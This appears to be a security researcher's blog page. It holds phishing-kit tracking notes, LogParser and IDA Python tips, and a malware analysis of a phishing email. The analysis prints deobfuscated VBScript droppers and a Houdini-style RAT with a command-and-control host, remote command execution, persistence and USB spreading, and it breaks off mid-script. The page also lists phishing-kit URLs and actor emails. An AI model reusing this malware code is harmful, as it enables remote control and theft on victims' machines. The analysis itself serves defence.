Friday, November 30, 2018

PhishingKitTracker by neonprimetime

community I've recorded the from each for the last year & started tracking them out on to share with you. My hope is this can somehow be used to fight the onslaught of seen daily See the list

https://github.com/neonprimetime/PhishingKitTracker/blob/master/PhishingKitTracker.csv

I have 500 phishing kits so far and the data paints some interesting pictures. Such as 82% of the phishing kits I tracked use a account to receive the stolen creds. I've also found threat actors that re-use so you can perhaps link together campaigns.

A big thank you, all the credit for the data goes to the community on twitter that hunts and finds all the evil sites such as and everyone else in the community

If anybody knows people , , , , that care about this type of data and could perhaps help the community start streamline reporting or detection of these email accounts that receive stolen creds daily that's be sweet.

If anybody knows a better place to upload zipped up phishing kits than VT , I'd love to be sharing and archiving them somewhere the whole community has access to.

If anybody every has threat actor emails they wanted appended to this list just CC me and I'll do my best to get them added

If anybody has suggestions on better ways to do this & share w/ the community, extra data/fields to track, etc. I'm all open ears, for example if somebody wanted to build a tracker website for the community to use you'd be my hero ! Otherwise, HAPPY FRIDAY

Wednesday, November 28, 2018

Excel SumIf example

=SUMIF(B2:B23, I2, F2:F23)

LogParser basic syntax

LogParser.exe -i:EVT -h       [prints the columns available on that event log type]

# Windows Auth (Security)
select where LogonType <> '3'
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings, 8, '|') as LogonType,EXTRACT_TOKEN(Strings, 17, '|') AS ProcessName,EXTRACT_TOKEN(Strings, 18, '|') AS SourceIP FROM logs.evtx where EventID=4624 and EXTRACT_TOKEN(Strings, 8, '|') <> '3'"

# Windows Task Scheduler
LogParser.exe -i:EVT "SELECT EXTRACT_TOKEN(Strings, 0, '|') as TaskName, EXTRACT_TOKEN(Strings, 1, '|') as Path, EXTRACT_TOKEN(Strings, 2, '|') as ProcessId, EXTRACT_TOKEN(Strings, 3, '|') AS Priority FROM Microsoft-Windows-TaskScheduler%4Operational.evtx where EventID = 129 and EXTRACT_TOKEN(Strings, 1, '|') not like '%Sophos%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%GoogleUpdate%' and EXTRACT_TOKEN(Strings, 0, '|') not like '%Database One%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Small Business%' and EXTRACT_TOKEN(Strings, 1, '|') not like '%Solutions BPA%'

LogParser.exe -i:EVT "select * from security.evtx" -rtp:-1

LogParser.exe -i:EVT "select * from security.evtx_ where eventid=4703" -rtp:-1

LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc" -rtp:-1

LogParser.exe -i:EVT "select eventid, count(*) from security.evtx_ group by eventid order by count(*) desc"  -rtp:-1 -o:csv > out.csv

LogParser.exe -i:EVT "select timegenerated from system.evtx_ where message not like '%description for%' AND timegenerated >= '2018-11-26 05:00:00' and timegenerated <= '2018-11-26 18:00:00'"  -rtp:-1

LogParser.exe -i:EVT "select timegenerated, strings from security.evtx_ where strings not like '%privilege%'"  -rtp:-1 -o:csv > out.csv


NOTE:
The rtp parameter suppresses the "press a key" paging feature that is default for log parser
 -rtp:-1

NOTE:
If you get "The description for event id ... cannot be found" for every message it might be because

user account needs the"Manage auditing and security log." permission

Monday, November 12, 2018

IDA common locations to put breakpoints

I'm learning that if you're looking for somewhere to breakpoint in confusing malware try

jmp eax ;   // or any register for that matter, it's jumping to a dynamic address
call eax ;   // or any register for that matter, it's jumping to a dynamic address
call dword_xxx;   // it's jumping to an address saved in data, perhaps dynamically loaded

Also a breakpoint in
ntdll.dll -> ResumeThread ; // malware may suspend and then restart when completed editing
ntdll.dll -> ResumeProcess ; // malware may suspend and then restart when completed editing

Also look at the IDA color coded graph across the top, look for a large chunk of data, which is probably the packed code, find the label for it, for xrefs to that label, then breakpoint there.

IDA Error "The instruction at ... referenced memory at ... The memory could not be written"

If you're running malware in IDA and get a error such as

8A1EE: The instruction at 0x8A1EE referenced memory at 0x0. The memory could not be written -> 0000000000000000 (exc.code c0000006, tid 2268)

Per the OALabs youtube video

https://www.youtube.com/watch?v=ScBB-Hi7NxQ

This might be caused by the Debugger holding a handle to malware sample and the malware itself wanting its own exclusive handle to the file.

Thus the malware errors out because it cannot collect an exclusive handle to the malware sample since the debugger already has a handle.

To remediate, one potential fix is to try ...
- Set a breakpoint in IDA on startup
- In the debugger "Modules" window, find "ntdll.dll" and the "NtCreateFile" function, set a breakpoint
- Continue the debugger, it will eventually hit NtCreateFile
- Then "Continue until Return" multiple times until you return to the malware code
- In my case it was a call to "kernel32.dll" "CreateFileA" that triggered this call
- If you look at the parameters to "CreateFileA", the 3rd parameter was set to 0 which means an exclusive handle
- If you look in the return result of CreateFileA it returned FFFFFFFF which means an "invalid file handle" which is what's causing the error
- So, add a breakpoint to this CreateFileA call
- Kill the debugging process
- Re-launch the program until it hits your new breakpoint
- Change that 3rd parameter from 0x0 to 0x7 to give yourself full access
- Now allow it to run, and notice the return value is no longer FFFFFFFF , it's a valid file handle now, and thus you've gotten past that error caused by the exclusive handle!

#phishingkit threat actor emails 2018-11-12

#phishingkit actor emails
https://twitter.com/Techhelplistcom/status/1061885792027586560
185.52.3.156 http://routelabel.net  hosting



12\12\12\authenticate.php:$email= "cforeplyto@gmail.com";
12\12\12\login.php:$email= "cforeplyto@gmail.com";
drop\newdropbox\00\000\001\index\gm33ail\geemail.php: $to ="andyjames009@yandex.com";
2019box\SA\drop\newdropbox\00\000\001\index\li33ve\li33ve.php: $to ="gdaan7@gmail.com";
2019box\SA\drop\newdropbox\00\000\001\index\off33ice\off33ice.php: $to ="gdaan7@gmail.com";
2019box\SA\drop\newdropbox\00\000\001\index\others\otherother.php: $to ="gdaan7@gmail.com";
2019box\SA\drop\newdropbox\00\000\001\index\yah33oo\yah33oo.php: $to ="gdaan7@gmail.com";
Anymail%20Magnet\magnet\loader.php:$to = "mchlliving@gmail.com"; 
Anymail%20Magnet\magnet\Verify.php:$to = "mchlliving@gmail.com"; 
Anymail%20Magnet%20-%20zilo\magnet\loader.php:$to = "zakichahul@gmail.com"; 
Anymail%20Magnet%20-%20zilo\magnet\Verify.php:$to = "zakichahul@gmail.com"; 
luno\index2.php:    $to = "markjamesons717@gmail.com";
luno\index2.php:        "CC:markjamesons717@gmail.com";
microsoftonline.secured\m1soft\verify.php:$mail_to = "feminist008@gmail.com";
sharep\final.php:$send = "steveaustin1234@gmail.com";



http://uahowias.com/12.zip
http://zahwes.com/microsoftonline.secured.zip
http://qtoksa.com/verify.login.microsoftonline/sharep.zip
http://taowlk.com/Luno/luno.zip
http://hanlskes.com/Anymail%20Magnet.zip
http://hanlskes.com/forum/Anymail%20Magnet.zip
http://hanlskes.com/invoice/Anymail%20Magnet.zip
http://hanlskes.com/admin/Anymail%20Magnet.zip
http://hanlskes.com/Confirmation/Anymail%20Magnet%20-%20zilo.zip
http://hanlskes.com/Proposal%20/Anymail%20Magnet.zip
http://kalusm.com/2019box.zip


#phishingkit actor emails
https://twitter.com/Techhelplistcom/status/1061845780791726081
103.75.189.106 vpsmalaysia[.]com[.]my hosting


amiro\includes\my_email.php:$my_email = "madauthy@protonmail.com"; 
Excel23\next.php:$send = "paulm.petromin@gmail.com";
HotmailOfficeNew\next.php:$send = "paulm.petromin@gmail.com";
microsoftonline.secured\m1soft\verify.php:$mail_to = "feminist008@gmail.com";
NAVER\oku.php:$send = "ddonwise1010@yandex.com, maria.hirschberghof@gmail.com";
office365\next.php:$send = "anny.duweivices@gmail.com";
wetransfers\next.php:$send = "anny.duweivices@gmail.com";



http://chowusi.com/download/OUTLOOKNEW.zip
http://batwoks.com/test/test_files.zip
http://swealsk.com/11/NAVER.zip
http://swealsk.com/13/NAVER.zip
http://swealsk.com/6/NAVER.zip
http://swealsk.com/10/NAVER.zip
http://swealsk.com/7/NAVER.zip
http://swealsk.com/8/NAVER.zip
http://swealsk.com/2/NAVER.zip
http://swealsk.com/5/NAVER.zip
http://swealsk.com/9/NAVER.zip
http://swealsk.com/3/NAVER.zip
http://swealsk.com/12/NAVER.zip
http://swealsk.com/1/NAVER.zip
http://swealsk.com/4/NAVER.zip
http://bahlowk.com/amiro.zip
http://ualkws.com/microsoftonline.secured.zip
http://gaklosk.com/microsoftonline.secured.zip
http://ouiask.com/HotmailOfficeNew.zip
http://ouiask.com/office365.zip
http://ouiask.com/Excel23.zip
http://ouiask.com/wetransfers.zip


#phishingkit threat actor emails
https://twitter.com/Techhelplistcom/status/1061840412883722240
35.183.119.114 @digitalocean hosting



1\1\1\1\passportx.php:$send = "zzxxccah22@gmail.com";
domain_updated\review\connectID.php:$own = 'cleanestresults@gmail.com';
form\bringitback.php:$send = "ladi.pupo@yandex.com";
office\office365\bringitback.php:$send = "ladi.pupo@yandex.com";
office365\form\bringitback.php:$send = "ladi.pupo@yandex.com";
Review\file\site\process.php:$to = "info.contactsss01@gmail.com";



http://fbg6.cf/qw/General.zip
http://b6y76.ga/feyi/newestyahoo.zip
http://b6y76.ga/uu/Docusign%20_1.zip
http://b6y76.ga/faith/secure01c.chase.web.auth.dashboard..zip
http://b6y76.cf/ll/domain_updated.zip
http://sfdgvr65.ga/hot-auto.zip
http://sfdgvr65.cf/ourtimet%20_1.zip
http://fbg6.ga/office365/form.zip
http://fbg6.ga/office365.zip
http://fbg6.ga/office.zip
http://fbg6.ga/office/office365.zip
http://gb667u76.tk/1.zip
http://gb667u76.tk/review/Review.zip

Friday, November 9, 2018

IDA Python bitwise NOT Decode malware strings

If you have an area in memory that is xor obfuscated

debug007:0018FB06 db  9Ch ; Å“
debug007:0018FB07 db  1Ah

and you have assembly code that decodes it with a bitwise not like this

.text:00401671 movzx   edx, byte ptr [eax+3]
.text:00401675 not     cl
.text:00401677 xor     dl, 75h


You can decode it to read it in IDA Python scripting by going to
file -> script command
and entering code like this
where 'd' is filled with the encoded hex values
and the print statements are filled with the individual xor values from the code

from textwrap import wrap
d = "9c1a"
bytes = wrap(d, 2)
for i in range(len(bytes)):
 bytes[i] = int(bytes[i],16)
print(chr((~bytes[0]) & 0x000000FF))
print(chr(bytes[1] ^ 0x75))


thus in this example
d = "9c1a"
prints out
'co'

IDA Python Xor Decode malware strings

If you have an area in memory that is xor obfuscated

debug007:0018FB04 db 0CEh ; ÃŽ
debug007:0018FB05 db  27h ; '
debug007:0018FB06 db  9Ch ; Å“
debug007:0018FB07 db  1Ah
debug007:0018FB08 db  95h ; •
debug007:0018FB09 db  2Eh ; .
debug007:0018FB0A db  22h ; "
debug007:0018FB0B db  57h ; W
debug007:0018FB0C db  91h ; ‘
debug007:0018FB0D db  21h ; !
debug007:0018FB0E db  57h ; W
debug007:0018FB0F db  3Ah ; :

and you have assembly code that decodes or xors it to get it back to readable value

.text:00401654 mov     eax, [esp+28h+arg_0]
.text:00401658 movzx   ecx, byte ptr [eax]
.text:0040165B movzx   edx, byte ptr [eax+1]
.text:0040165F xor     cl, 0A3h
.text:00401662 xor     dl, 54h
.text:00401665 mov     [esp+28h+memcpySource], cl
.text:00401669 movzx   ecx, byte ptr [eax+2]
.text:0040166D mov     [esp+28h+var_23], dl
.text:00401671 movzx   edx, byte ptr [eax+3]
.text:00401675 not     cl
.text:00401677 xor     dl, 75h
.text:0040167A mov     [esp+28h+var_22], cl
.text:0040167E movzx   ecx, byte ptr [eax+4]
.text:00401682 mov     [esp+28h+var_21], dl
.text:00401686 movzx   edx, byte ptr [eax+5]
.text:0040168A xor     cl, 0E7h
.text:0040168D xor     dl, 44h
.text:00401690 mov     [esp+28h+var_20], cl
.text:00401694 movzx   ecx, byte ptr [eax+6]
.text:00401698 mov     [esp+28h+var_1F], dl
.text:0040169C movzx   edx, byte ptr [eax+7]
.text:004016A0 xor     cl, 4Bh
.text:004016A3 xor     dl, 23h
.text:004016A6 mov     [esp+28h+var_1E], cl
.text:004016AA movzx   ecx, byte ptr [eax+8]
.text:004016AE mov     [esp+28h+var_1D], dl
.text:004016B2 movzx   edx, byte ptr [eax+9]
.text:004016B6 xor     cl, 0BFh
.text:004016B9 xor     dl, 45h
.text:004016BC mov     [esp+28h+var_1C], cl
.text:004016C0 movzx   ecx, byte ptr [eax+0Ah]
.text:004016C4 mov     [esp+28h+var_1B], dl
.text:004016C8 movzx   edx, byte ptr [eax+0Bh]
.text:004016CC xor     cl, 3Bh
.text:004016CF xor     dl, 56h


You can decode or xor it to read it in IDA Python scripting by going to
file -> script command
and entering code like this
where 'd' is filled with the encoded hex values
and the print statements are filled with the individual xor values from the code

from textwrap import wrap
d = "ce279c1a952e22579121573a"
bytes = wrap(d, 2)
for i in range(len(bytes)):
 bytes[i] = int(bytes[i],16)
print(chr(bytes[0] ^ 0xa3))
print(chr(bytes[1] ^ 0x54))
print(chr((~bytes[2]) & 0x000000FF))
print(chr(bytes[3] ^ 0x75))
print(chr(bytes[4] ^ 0xe7))
print(chr(bytes[5] ^ 0x44))
print(chr(bytes[6] ^ 0x4b))
print(chr(bytes[7] ^ 0x23))
print(chr(bytes[8] ^ 0xbf))
print(chr(bytes[9] ^ 0x45))
print(chr(bytes[10] ^ 0x3b))
print(chr(bytes[11] ^ 0x56))


thus in this example
d = "ce279c1a952e22579121573a"
prints out
mscorjit.dll

which is a library the malware is going to load

IDA Get String pointed to by Address

Related to this blog post
https://neonprimetime.blogspot.com/2018/10/malwaretech-ida-python-cheatsheet.html
and this
https://neonprimetime.blogspot.com/2018/11/ida-python-print-string-in-register.html

If you're in IDA and you have a address that you know points to a string

0018FB7C db 6Dh ; m
0018FB7D db 73h ; s
0018FB7E db 63h ; c
0018FB7F db 6Fh ; o
0018FB80 db 72h ; r
0018FB81 db 6Ah ; j
0018FB82 db 69h ; i
0018FB83 db 74h ; t
0018FB84 db 2Eh ; .
0018FB85 db 64h ; d
0018FB86 db 6Ch ; l
0018FB87 db 6Ch ; l
0018FB88 db 0 ; 0

And you want to print out that string go to
File -> Script Command

Choose Python as your scripting language

type in this command and hit run

print(GetString(0x0018FB7C))

which displays in the Output Window
mscorjit.dll

IDA Python Get String pointed to by Register

Related to this blog post
https://neonprimetime.blogspot.com/2018/10/malwaretech-ida-python-cheatsheet.html

If you're in IDA and you have a register, say EAX pointing to a location

RAX 000000000018FB7C

0018FB7C db 6Dh ; m
0018FB7D db 73h ; s
0018FB7E db 63h ; c
0018FB7F db 6Fh ; o
0018FB80 db 72h ; r
0018FB81 db 6Ah ; j
0018FB82 db 69h ; i
0018FB83 db 74h ; t
0018FB84 db 2Eh ; .
0018FB85 db 64h ; d
0018FB86 db 6Ch ; l
0018FB87 db 6Ch ; l
0018FB88 db 0 ; 0

And you want to print out that string go to
File -> Script Command

Choose Python as your scripting language

type in this command and hit run

print(GetString(GetRegValue("EAX")))

which displays in the Output Window
mscorjit.dll

VBA Macro Print Variable to Body

If you're debugging malicious macros in word documents using the Developer tab, sometimes you may get the urge to print out the contents of a variable to a Message Box

MsgBox(evilvariable)

The problem is , message boxes get truncated if the variable is too long and you can't easily copy & paste the contents into a text editor for example.

Thus I've found a better solution is to overwrite the body of the word document like so

ActiveDocument.Content = evilvariable

Works great, now you can view it and all copy & paste out to a text editor!

Monday, November 5, 2018

Jrat and Bitcoin miner from Phishing email with .IMG with nested .VBS 11/5/2018

phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside


X-Env-Sender: dbittnerf@gmail.com
x-originating-ip: [162.144.196.83]
Received: from server.ineli-mena.org (HELO server.ineli-mena.org)
From: "Purchase Assistance" <dbittnerf@gmail.com>
Subject: RE: B&G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018 

-------------


more details here

https://pastebin.com/raw/tkGXMENU

and also pasted below

---------------


#phishing email drops a bitcoin miner and jrat out of a .IMG file with a .VBS inside

more info @neonprimetime
https://neonprimetime.blogspot.com/2018/11/jrat-and-bitcoin-miner-from-img-vbs-phish.html

------
VT links
------
https://www.virustotal.com/#/file/f2bd54981d86e7d475164ca5725090232dc1efd5251c42b58292d8b51e506aa2/community
https://www.virustotal.com/#/file/370784be22039af009a0b4e7915e36c4899133ac3afbb659cbbbec03dc9a2c6e/community
https://www.virustotal.com/#/file/07e13a645058b0f0afe4e79a34abf08dbead97c50b41cb9593035af13250e0f1/community
https://www.virustotal.com/#/file/b0cf01550e576a21ff62f1c34dbe202b14b73b0465cdf7558c445f09eee3a6c1/community
https://www.virustotal.com/#/file/5dcd1a584e27f75870b2c95aac56523927377d8c693fe6fc8a3f422cac79cadc/community
https://www.virustotal.com/#/file/77ecb4b190368eacf09103247fdd75c0c30a6b3c3340acb3d15df7747178cabc/community

----
app anyrun
----
https://app.any.run/tasks/77449da4-d60e-4c45-922c-b4a85c7ef814

-----
dns
-----
welcomehome.duckdns.org [173.46.85.98]
fud.fudcrypt.com

----
md5 hashes
----
f3a99bcd752bff6a15154484c94cdc21
f3c67b1a2631fde05b24ab26ce5bf6ea
b93df40c82b94680218ea964b5ce6808 ( THOR APT scanner says #magickitten #jrat #MiddleEasternThreatGroups )
11d828c9301a36749174b1e0459cba55
d859b188405930541aea64ad22f8cf92
7443f9ecbd050b1e7eae529983543b05

------
email headers
------
X-Env-Sender: dbittnerf@gmail.com 
x-originating-ip: [162.144.196.83] 
Received: from server.ineli-mena.org (HELO server.ineli-mena.org) 
From: "Purchase Assistance" <dbittnerf@gmail.com> 
Subject: RE: B&amp;G EQUIPMENT PO# 102571
Date: Mon, 5 Nov 2018

---------------
vbscript
---------------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "m"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing

---------------
decoded binary
---------------
Const TypeBinary = 1
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim longText1
longText1 = "[REMOVED]"
Set wshShell1 = CreateObject("WScript.Shell")
Dim appdatadir1, stubpath1
appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%")
stubpath1 = appdatadir1 & "\VRMedabkRb.vbs"
Dim decoded1
decoded1 = decodeBase64(longText1)
writeBytes stubpath1, decoded1
wshShell1.Run("""" & stubpath1 & """")
Set wshShell1 = Nothing
Dim longText
longText = "[REMOVED]"
longText = Replace(longText, "#(", "A")
Set wshShell = CreateObject( "WScript.Shell" )
Dim tempdir, appdatadir, text, stubpath
tempdir = wshShell.ExpandEnvironmentStrings("%temp%")
appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%")
stubpath = appdatadir & "\ntfsmgr.jar"
Dim decoded
decoded = decodeBase64(longText)
writeBytes stubpath, decoded
Set fso  = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text = "" Then
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion")
text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" & text & "\JavaHome")
If text <> "" Then
text = text & "\bin\javaw.exe"
End If
Else
text = text & "\bin\javaw.exe"
End If
If InStr(text, "jre") > 0 Then
Dim validJrePath
validJrePath = getValidJre(text)
If InStr(validJrePath, "javaw.exe") > 0 Then
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & validJrePath & """ -jar """ & stubpath & """", "REG_SZ"
wshShell.Run("""" & validJrePath & """" & " -jar " & """" & stubpath & """")
Else
GrabJreFromNet()
End If
Else
GrabJreFromNet()
End If
Private Sub GrabJreFromNet()
Dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://www.thegoldfingerinc.com/images/jre.zip", False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile appdatadir & "\jre.zip", 2 
end with
UnZip appdatadir & "\jre.zip", appdatadir & "\jre7"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.7", "REG_SZ"
wshShell.RegWrite "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.7\JavaHome", appdatadir & "\jre7", "REG_SZ"
wshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """", "REG_SZ"
wshShell.Run("""" & appdatadir & "\jre7\bin\javaw.exe"" -jar " & """" & stubpath & """")
End Sub
Private Function decodeBase64(base64)
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.DataType = "bin.base64"
EL.Text = base64
decodeBase64 = EL.NodeTypedValue
End Function
Private Sub writeBytes(file, bytes)
Dim binaryStream
Set binaryStream = CreateObject("ADODB.Stream")
binaryStream.Type = TypeBinary
binaryStream.Open
binaryStream.Write bytes
binaryStream.SaveToFile file, ForWriting
End Sub
Sub UnZip(zipfile, ExtractTo)
if fso.GetExtensionName(zipfile) = "zip" then
If NOT fso.FolderExists(ExtractTo) Then
fso.CreateFolder(ExtractTo)
End If
set objShell = CreateObject("Shell.Application")
set destination = objShell.NameSpace(ExtractTo)
set zip_content = objShell.NameSpace(zipfile).Items   
for i = 0 to zip_content.count - 1
if (fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))) then
fso.DeleteFile(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName(zip_content.item(i).path))
end if
destination.copyHere zip_content.item(i), 20
next 
End if
End Sub
Function getValidJre(res)
a = Split(res, vbCrLf)
for each x in a
if InStr(x, "javaw.exe") > 0 Then
Return = wshShell.Run("cmd /c " & """" & x & """" & " -version 2> %temp%\output.txt", 0, true)
Set file = fso.OpenTextFile(tempdir & "\output.txt", 1)
text = file.ReadAll
file.Close
If InStr(text, "1.6") > 0 Or InStr(text, "1.7") > 0 Or InStr(text, "1.8") > 0 Then
getValidJre = x
Exit Function
End If
End If
next
End Function
Set wshShell = Nothing


------
nested vbscript
------
Set noun = CreateObject("ADODB.Stream")
Private Function hen(water, omo, alafia)
  If omo = 4 Then
    noun.Type = 1
    noun.Open
    noun.Write water
    noun.Position = 0
    noun.Type = 2
    noun.CharSet = "us-ascii"
    hen = noun.ReadText
  End If
End Function

Private Function bas_6_4_2_bin(kintu, kinpo, kili, manj, aaro, sport)
    Set ms_lmx_dfa = CreateObject("Microsoft.XMLDOM")
    Set ms_pmt_dfa = ms_lmx_dfa.createElement("tmp")
    ms_pmt_dfa.DataType = "bin.base64"
    ms_pmt_dfa.Text = kili
    bas_6_4_2_bin = ms_pmt_dfa.NodeTypedValue
End Function
Private Sub table(chair, milo, sound, clef, sule, naira)
 For i = 0 To 0
     ExecuteGlobal naira
 Next
End Sub

Private Function linen(stove, gard, radio, ladela)
    Dim m_u_t_e_x, the_const, m_a_i_n, pau_sed
    m_u_t_e_x = "#("
    the_const = "A"
    m_a_i_n = "[REMOVED]"
    pau_sed = ""
    If radio = 0 Then
        pau_sed = Replace(m_a_i_n, m_u_t_e_x, the_const)
        linen = bas_6_4_2_bin(Nothing, 1, pau_sed, 10, 87, False)
    Else
        'table "7", False, 10, ladela, Nothing, 10
        linen = ladela
    End If
End Function
Dim kilimanjaro
kilimanjaro = linen(0, Nothing, 1, hen(linen(0, Nothing, 0, 284), 4, Nothing))
table "2", Nothing, False, True, 0, kilimanjaro
Set noun = Nothing


-----
3rd nested script decoded
-----

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

'host = "pm2bitcoin.com"
'port = 3175
host = "fud.fudcrypt.com"
port = 7755
installdir = "%appdata%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
